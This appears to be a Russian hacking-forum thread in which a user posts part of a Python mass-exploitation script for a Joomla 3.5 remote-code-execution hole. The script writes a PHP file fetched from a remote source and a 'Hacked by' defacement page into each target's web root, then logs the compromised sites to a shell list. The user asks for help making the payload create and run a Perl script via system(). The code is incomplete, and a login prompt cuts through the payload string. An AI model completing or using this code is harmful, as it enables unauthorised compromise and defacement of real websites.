• Codeby web-security - Курс "Тестирование Веб-Приложений на проникновение с нуля" от команды codeby. Общая теория, подготовка рабочего окружения, пассивный фаззинг и фингерпринт, Активный фаззинг, Уязвимости, Пост-эксплуатация, Инструментальные средства, Social Engeneering и многое другое. Подробнее ...

  • Мобильный клиент нашего форума для Android гаджетов доступен в Google Play Market по этой ссылке. Клиент можно скачать с нашего форума по этой ссылке. Последняя версия МК в нашем телеграм канале вот здесь. Мобильный клиент для IOS находится в itunes по этой ссылке

payload

kamaz

Well-known member
14.01.2018
101
17
#1
Привет возник такой в эксплойтах типа RCE используют пайлоды ,
вот пример создания страницы пхп с Hacked by

pl = generate_payload("fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/Mah.php','w+'),file_get_contents('
Для просмотра контента необходимо: Войти или зарегистрироваться
fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/Mah.htm','w+'),'Hacked by');")
for i in fil.readlines():
try:
i=i.strip()
print get_url(i, pl)
lala=requests.get(i+"/Mah.htm")
if "Hacked" in lala.content:
z=open('Joomla_3.5_Shell.txt','a')
z.write(i+"/Mah.htm\n")
z.close()
except:
pass

fil.close()

Моя задача создать файл main.pl добавить в него некий код после чего исполнить perl main.pl

такое возможно сделать?
 

kamaz

Well-known member
14.01.2018
101
17
#2
хороший человек подсказал чтос помощью функции system это делаеться,может кто то помоч
привести это в рабочий вид?
спасибо
 
Вверх Снизу